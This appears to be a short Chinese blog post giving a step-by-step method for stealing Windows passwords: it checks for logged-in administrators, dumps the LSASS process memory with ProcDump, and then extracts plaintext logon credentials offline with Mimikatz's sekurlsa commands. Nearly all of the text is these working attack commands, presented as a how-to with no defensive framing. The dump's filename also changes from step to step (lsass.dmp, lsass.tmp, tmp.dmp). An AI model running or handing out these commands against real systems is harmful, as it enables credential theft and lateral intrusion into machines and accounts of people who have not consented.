Prodump+Mimikatz抓取windows系统密码

1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。
query user
在这里插入图片描述

2、查看目标系统版本。
wmic OS get Caption,OSArchitecture
在这里插入图片描述
3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
在这里插入图片描述
4、将lsass.tmp拉取到本地使用mimikatz解密目标系统密码。(本地机器需与目标机器的版本位数一致。)
mimikatz.exe “log res.log” “sekurlsa::minidump tmp.dmp” “sekurlsa::logonPasswords full” exit
在这里插入图片描述

发布了48 篇原创文章 · 获赞 22 · 访问量 2万+

猜你喜欢

转载自blog.csdn.net/lhh134/article/details/104300331